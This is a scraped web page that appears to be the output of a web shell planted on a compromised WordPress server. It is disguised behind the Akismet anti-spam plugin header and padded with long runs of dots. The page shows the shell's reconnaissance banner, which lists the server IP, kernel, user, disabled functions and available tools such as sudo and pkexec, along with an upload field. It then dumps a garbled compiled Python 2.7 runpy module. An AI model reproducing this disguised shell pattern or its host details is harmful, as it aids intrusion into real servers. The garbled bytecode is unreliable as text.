#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib64/python2.7/ |
Upload File : |
�
ٜSec @ s{ d Z d d l Z d d l Z d d l m Z y d d l m Z Wn! e k
re d d l m Z n Xd d g Z d e f d � � YZ d e f d
� � YZ
d d d d d d � Z d d d d d d � Z
d
� Z d � Z d � Z e d � Z d d e d � Z d � Z d � Z d d d � Z e d k rwe e j � d k rYe j d IJqwe j d =e e j d � n d S( sZ runpy.py - locating and running Python code using the module namespace
Provides support for locating and running Python scripts using the Python
module namespace instead of the native filesystem.
This allows Python code to play nicely with non-filesystem based PEP 302
importers when locating support scripts as well as when importing modules.
i����N( t read_code( t
get_loadert
run_modulet run_patht _TempModulec B s) e Z d Z d � Z d � Z d � Z RS( sC Temporarily replace a module in sys.modules with an empty namespacec C s( | | _ t j | � | _ g | _ d S( N( t mod_namet impt
new_modulet modulet
_saved_module( t selfR ( ( s /usr/lib64/python2.7/runpy.pyt __init__ s c C sL | j } y | j j t j | � Wn t k
r7 n X| j t j | <| S( N( R R t appendt syst modulest KeyErrorR ( R
R ( ( s /usr/lib64/python2.7/runpy.pyt __enter__ s
c G s= | j r# | j d t j | j <n
t j | j =g | _ d S( Ni ( R R
R R ( R
t args( ( s /usr/lib64/python2.7/runpy.pyt __exit__( s
( t __name__t
__module__t __doc__R R R ( ( ( s /usr/lib64/python2.7/runpy.pyR s t _ModifiedArgv0c B s# e Z d � Z d � Z d � Z RS( c C s | | _ t � | _ | _ d S( N( t valuet objectt _saved_valuet _sentinel( R
R ( ( s /usr/lib64/python2.7/runpy.pyR 0 s c C sE | j | j k r! t d � � n t j d | _ | j t j d <d S( Ns Already preserving saved valuei ( R R t RuntimeErrorR
t argvR ( R
( ( s /usr/lib64/python2.7/runpy.pyR 4 s c G s | j | _ | j t j d <d S( Ni ( R R R R
R ( R
R ( ( s /usr/lib64/python2.7/runpy.pyR : s ( R R R R R ( ( ( s /usr/lib64/python2.7/runpy.pyR / s c B sJ | d k r | j | � n | j d | d | d | d | � | | U| S( s) Helper to run code in nominated namespaceR t __file__t
__loader__t __package__N( t Nonet update( t codet run_globalst init_globalsR t mod_fnamet
mod_loadert pkg_name( ( s /usr/lib64/python2.7/runpy.pyt _run_code>